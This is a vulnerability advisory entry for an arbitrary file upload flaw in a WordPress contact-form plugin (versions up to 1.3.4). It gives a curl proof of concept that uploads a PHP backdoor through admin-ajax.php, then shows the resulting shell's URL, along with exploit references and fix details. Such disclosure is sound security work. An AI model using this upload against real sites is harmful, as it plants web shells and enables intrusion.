N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload



Description
The "upload_file()" ajax function is affected from unrestricted file upload vulnerability. 
Proof of Concept
curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://www.example.com/wp-admin/admin-ajax.php

Response: {"status":"uploaded","filename":"1427927588-backdoor.php"}

http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php 

Affects Plugin

fixed in version 1.4
- plugin closed

References

ExploitDB 36738
Metasploit exploit/unix/webapp/wp_nmediawebsite_file_upload
PacketStorm 131413
PacketStorm 131514
URL http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter Claudio Viviani
Submitter Website http://www.homelab.it
Submitter Twitter homelabit
Views 4878
Verified Yes
WPVDB ID 7896

Timeline

Publicly Published 2015-04-12 (about 5 years ago)
Added 2015-04-13 (about 5 years ago)
Last Updated 2019-10-21 (8 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin